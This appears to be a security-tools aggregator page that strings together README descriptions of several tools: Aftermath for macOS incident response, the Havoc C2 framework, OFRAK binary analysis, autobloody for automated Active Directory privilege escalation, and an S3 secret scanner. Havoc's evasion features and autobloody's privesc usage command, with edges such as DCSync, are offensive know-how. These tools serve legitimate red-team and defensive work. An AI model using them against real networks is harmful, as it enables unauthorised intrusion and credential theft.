Aftermath first runs a series of collection modules. The output is written either to a location of your choice, via the -o or --output option, or, by default, to the /tmp directory.

Once collection is complete, the final zip/archive file can be pulled from the end user's disk. This file can then be analyzed using the --analyze argument pointed at the archive file. The results of this will be written to the /tmp directory. The administrator can then unzip that analysis directory and see a parsed view of the locally collected databases, a timeline of files with the file creation, last accessed, and last modified dates (if they're available), and a storyline which includes the file metadata, database changes, and browser information to potentially track down the infection vector.


Build

To build Aftermath locally, clone it from the repository

git clone https://github.com/jamf/aftermath.git

cd into the Aftermath directory

cd <path_to_aftermath_directory>

Build using Xcode

xcodebuild

cd into the Release folder

cd build/Release

Run aftermath

sudo ./aftermath

Usage

Aftermath needs to be root, as well as have full disk access (FDA) in order to run. FDA can be granted to the Terminal application in which it is running.

The default usage of Aftermath runs

sudo ./aftermath

To specify certain options

sudo ./aftermath [option1] [option2]

Examples

sudo ./aftermath -o /Users/user/Desktop --deep
sudo ./aftermath --analyze <path_to_collection_zip>

Releases

There is an Aftermath.pkg available under Releases. This pkg is signed and notarized. It will install the aftermath binary at /usr/local/bin/. This would be the ideal way to deploy via MDM. Since this is installed in bin, you can then run aftermath like

sudo aftermath [option1] [option2]

Uninstall

To uninstall the aftermath binary, run the AftermathUninstaller.pkg from the Releases. This will uninstall the binary and also run aftermath --cleanup to remove aftermath directories. If any aftermath directories reside elsewhere (from using the --output option), it is the responsibility of the user/admin to remove them.

Help Menu

Contributors
  • Stuart Ashenbrenner
  • Jaron Bradley
  • Maggie Zirnhelt
  • Matt Benyo
  • Ferdous Saljooki

Thank You

This project leverages the open source TrueTree project, written and licensed by Jaron Bradley.



Havoc - Modern and malleable post-exploitation command and control framework


Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider.

Havoc is in an early state of release. Breaking changes may be made to APIs/core structures as the framework matures.


Support

Consider supporting C5pider on Patreon/Github Sponsors. Additional features are planned for supporters in the future, such as custom agents/plugins/commands/etc.

Quick Start

Please see the Wiki for complete documentation.

Havoc works well on Debian 10/11, Ubuntu 20.04/22.04 and Kali Linux. It's recommended to use the latest versions possible to avoid issues. You'll need a modern version of Qt and Python 3.10.x to avoid build issues.

See the Installation guide in the Wiki for instructions. If you run into issues, check the Known Issues page as well as the open/closed Issues list.


Features

Client

Cross-platform UI written in C++ and Qt

  • Modern, dark theme based on Dracula

Teamserver

Written in Golang

  • Multiplayer
  • Payload generation (exe/shellcode/dll)
  • HTTP/HTTPS listeners
  • Customizable C2 profiles
  • External C2

Demon

Havoc's flagship agent written in C and ASM

  • Sleep Obfuscation via Ekko or FOLIAGE
  • x64 return address spoofing
  • Indirect Syscalls for Nt* APIs
  • SMB support
  • Token vault
  • Variety of built-in post-exploitation commands

Extensibility


Community

You can join the official Havoc Discord to chat with the community!

Contributing

To contribute to the Havoc Framework, please review the guidelines in Contributing.md and then open a pull-request!



OFRAK - Unpack, Modify, And Repack Binaries


OFRAK (Open Firmware Reverse Analysis Konsole) is a binary analysis and modification platform. OFRAK combines the ability to:

  • Identify and Unpack many binary formats
  • Analyze unpacked binaries with field-tested reverse engineering tools
  • Modify and Repack binaries with powerful patching strategies

OFRAK supports a range of embedded firmware file formats beyond userspace executables, including:

  • Compressed filesystems
  • Compressed & checksummed firmware
  • Bootloaders
  • RTOS/OS kernels

OFRAK equips users with:

  • A Graphical User Interface (GUI) for interactive exploration and visualization of binaries
  • A Python API for readable and reproducible scripts that can be applied to entire classes of binaries, rather than just one specific binary (see the sketch after this list)
  • Recursive identification, unpacking, and repacking of many file formats, from ELF executables, to filesystem archives, to compressed and checksummed firmware formats
  • Built-in, extensible integration with powerful analysis backends (angr, Binary Ninja, Ghidra, IDA Pro)
  • Extensibility by design via a common interface to easily write additional OFRAK components and add support for a new file format or binary patching operation
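As a taste of the Python API mentioned above, the snippet below sketches the typical load-and-unpack flow. Treat the class and method names as assumptions drawn from OFRAK's getting-started material; the exact API may differ between versions, so check ofrak.com/docs before relying on it:

# Names below (OFRAK, OFRAKContext, create_root_resource_from_file, unpack_recursively)
# are assumed from OFRAK's docs; verify against your installed version.
from ofrak import OFRAK, OFRAKContext


async def main(ofrak_context: OFRAKContext):
    # Load a binary as the root resource and recursively identify/unpack it.
    root = await ofrak_context.create_root_resource_from_file("firmware.bin")  # placeholder path
    await root.unpack_recursively()
    print("Unpacked", root)


if __name__ == "__main__":
    OFRAK().run(main)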

See ofrak.com for more details.


GUI Frontend

The web-based GUI view provides a navigable resource tree. For the selected resource, it also provides: metadata, hex or text navigation, and a mini map sidebar for quickly navigating by entropy, byteclass, or magnitude. The GUI also allows for actions normally available through the Python API like commenting, unpacking, analyzing, modifying and packing resources.

Getting Started

OFRAK uses Git LFS. This means that you must have Git LFS installed before you clone the repository! Install Git LFS by following the instructions here. If you accidentally cloned the repository before installing Git LFS, cd into the repository and run git lfs pull.

See docs/environment-setup for detailed instructions on how to install OFRAK.

Documentation

OFRAK has general documentation and API documentation. Both can be viewed at ofrak.com/docs.

If you wish to make changes to the documentation or serve it yourself, follow the directions in docs/README.md.

License

The code in this repository comes with an OFRAK Community License, which is intended for educational uses, personal development, or just having fun.

Users interested in OFRAK for commercial purposes can request the Pro License, which for a limited period is available for a free 6-month trial. See OFRAK Licensing for more information.

Contributing

Red Balloon Security is excited for security researchers and developers to contribute to this repository.

For details, please see our contributor guide and the Python development guide.

Support

Please contact ofrak@redballoonsecurity.com, or write to us on the OFRAK Slack with any questions or issues regarding OFRAK. We look forward to getting your feedback! Sign up for the OFRAK Mailing List to receive monthly updates about OFRAK code improvements and new features.


This material is based in part upon work supported by the DARPA under Contract No. N66001-20-C-4032. Any opinions, findings and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the DARPA. Distribution Statement โ€œAโ€ (Approved for Public Release, Distribution Unlimited).



Autobloody - Tool To Automatically Exploit Active Directory Privilege Escalation Paths Shown By BloodHound


autobloody is a tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound.

Description

This tool automates AD privesc between two AD objects: the source (the one we own) and the target (the one we want), provided a privesc path exists in the BloodHound database. The automation is composed of two steps:

  • Finding the optimal privesc path using BloodHound data and Neo4j queries.
  • Executing the found path using the bloodyAD package.

Because autobloody relies on bloodyAD, it supports authentication using cleartext passwords, pass-the-hash, pass-the-ticket or certificates and binds to LDAP services of a domain controller to perform AD privesc.


Installation

First if you run it on Linux, you must have libkrb5-dev installed on your OS in order for kerberos to work:

# Debian/Ubuntu/Kali
apt-get install libkrb5-dev

# Centos/RHEL
yum install krb5-devel

# Fedora
dnf install krb5-devel

# Arch Linux
pacman -S krb5

A python package is available:

pip install autobloody

Or you can clone the repo:

git clone --depth 1 https://github.com/CravateRouge/autobloody
pip install .

Dependencies

  • bloodyAD
  • Neo4j python driver
  • Neo4j with the GDS library
  • BloodHound
  • Python 3
  • Gssapi (linux) or Winkerberos (Windows)

How to use it

First, data must be imported into BloodHound (e.g. using SharpHound or BloodHound.py) and Neo4j must be running.

⚠️ -ds and -dt values are case sensitive

Simple usage:

autobloody -u john.doe -p 'Password123!' --host 192.168.10.2 -dp 'neo4jP@ss' -ds 'JOHN.DOE@BLOODY.LOCAL' -dt 'BLOODY.LOCAL'

Full help:

[bloodyAD]$ ./autobloody.py -h
usage: autobloody.py [-h] [--dburi DBURI] [-du DBUSER] -dp DBPASSWORD -ds DBSOURCE -dt DBTARGET [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-c CERTIFICATE] [-s] --host HOST

AD Privesc Automation

options:
  -h, --help            show this help message and exit
  --dburi DBURI         The host neo4j is running on (default is "bolt://localhost:7687")
  -du DBUSER, --dbuser DBUSER
                        Neo4j username to use (default is "neo4j")
  -dp DBPASSWORD, --dbpassword DBPASSWORD
                        Neo4j password to use
  -ds DBSOURCE, --dbsource DBSOURCE
                        Case sensitive label of the source node (name property in bloodhound)
  -dt DBTARGET, --dbtarget DBTARGET
                        Case sensitive label of the target node (name property in bloodhound)
  -d DOMAIN, --domain DOMAIN
                        Domain used for NTLM authentication
  -u USERNAME, --username USERNAME
                        Username used for NTLM authentication
  -p PASSWORD, --password PASSWORD
                        Cleartext password or LMHASH:NTHASH for NTLM authentication
  -k, --kerberos
  -c CERTIFICATE, --certificate CERTIFICATE
                        Certificate authentication, e.g: "path/to/key:path/to/cert"
  -s, --secure          Try to use LDAP over TLS aka LDAPS (default is LDAP)
  --host HOST           Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3)

How it works

First, a privesc path is found using Dijkstra's algorithm as implemented in Neo4j's GDS library. Dijkstra's algorithm solves the shortest-path problem on a weighted graph. By default the edges created by BloodHound have no weight, only a type (e.g. MemberOf, WriteOwner). A weight is therefore added to each edge according to the type of the edge and the type of node it reaches (e.g. user, group, domain).
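A hedged sketch of that weighting idea is shown below; the edge types are BloodHound's, but the weight values and the function are illustrative, not autobloody's actual cost model:

# Illustrative cost model: cheaper edges are preferred by Dijkstra's algorithm.
EDGE_WEIGHTS = {
    "MemberOf": 0,             # free: group membership requires no action
    "GenericAll": 2,
    "WriteDacl": 3,
    "ForceChangePassword": 5,  # more intrusive / harder to clean up
}

NODE_WEIGHTS = {"User": 0, "Group": 1, "Domain": 2}


def edge_cost(edge_type: str, target_node_type: str) -> int:
    """Weight an edge by its type and by the type of node it reaches."""
    return EDGE_WEIGHTS.get(edge_type, 4) + NODE_WEIGHTS.get(target_node_type, 1)


print(edge_cost("MemberOf", "Group"))            # 1
print(edge_cost("ForceChangePassword", "User"))  # 5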

Once a path is generated, autobloody connects to the DC, executes the path, and cleans up whatever is reversible (everything except ForcePasswordChange and setOwner).

Limitations

Only the following BloodHound edges are currently supported for automatic exploitation:

  • MemberOf
  • ForceChangePassword
  • AddMembers
  • AddSelf
  • DCSync
  • GetChanges/GetChangesAll
  • GenericAll
  • WriteDacl
  • GenericWrite
  • WriteOwner
  • Owns
  • Contains
  • AllExtendedRights


S3Crets_Scanner - Hunting For Secrets Uploaded To Public S3 Buckets


  • S3cret Scanner is a tool designed to provide a complementary layer to the Amazon S3 Security Best Practices by proactively hunting for secrets in public S3 buckets.
  • It can be executed as a scheduled task or on demand.

Automation workflow

The automation will perform the following actions:

  1. List the public buckets in the account (set with a public ACL, or where objects can be public); a minimal sketch of this step follows the list
  2. List the textual or sensitive files (e.g. .p12, .pgp and more)
  3. Download, scan (using truffleHog3) and delete each file from disk, one by one, once it has been evaluated
  4. The logs will be created in the logger.log file
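A minimal sketch of step 1, using boto3 to flag buckets whose ACL or policy makes them public; the helper name and checks are illustrative assumptions, not the scanner's exact logic:

import boto3  # pip install boto3
from botocore.exceptions import ClientError

s3 = boto3.client("s3")  # assumes credentials for the scanning role are already configured

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"


def is_public(bucket: str) -> bool:
    """Return True if the bucket ACL grants access to everyone or its policy is public."""
    acl = s3.get_bucket_acl(Bucket=bucket)
    if any(g.get("Grantee", {}).get("URI") == ALL_USERS for g in acl["Grants"]):
        return True
    try:
        status = s3.get_bucket_policy_status(Bucket=bucket)
        return status["PolicyStatus"]["IsPublic"]
    except ClientError:
        return False  # no bucket policy attached


for b in s3.list_buckets()["Buckets"]:
    if is_public(b["Name"]):
        print("public:", b["Name"])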

Prerequisites

  1. Python 3.6 or above
  2. TruffleHog3 installed in $PATH
  3. An AWS role with the following permissions:
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetLifecycleConfiguration",
                "s3:GetBucketTagging",
                "s3:ListBucket",
                "s3:GetAccelerateConfiguration",
                "s3:GetBucketPolicy",
                "s3:GetBucketPublicAccessBlock",
                "s3:GetBucketPolicyStatus",
                "s3:GetBucketAcl",
                "s3:GetBucketLocation"
            ],
            "Resource": "arn:aws:s3:::*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": "s3:ListAllMyBuckets",
            "Resource": "*"
        }
    ]
}
  4. If you're using a CSV file, make sure to place the file accounts.csv in the csv directory, in the following format:
Account name,Account id
prod,123456789
ci,321654987
dev,148739578

Getting started

Use pip to install the needed requirements.

# Clone the repo
git clone <repo>

# Install requirements
pip3 install -r requirements.txt

# Install trufflehog3
pip3 install trufflehog3

Usage

Argument | Values | Description | Required
--- | --- | --- | ---
-p, --aws_profile | | The AWS profile name for the access keys | ✓
-r, --scanner_role | | The AWS scanner's role name | ✓
-m, --method | internal | The scan type | ✓
-l, --last_modified | 1-365 | Number of days to scan since the file was last modified (default: 1) | ✗

Usage Examples

python3 main.py -p secTeam -r secteam-inspect-s3-buckets -l 1

Demo


Contributing

Pull requests and forks are welcome. For major changes, please open an issue first to discuss what you would like to change.



โŒ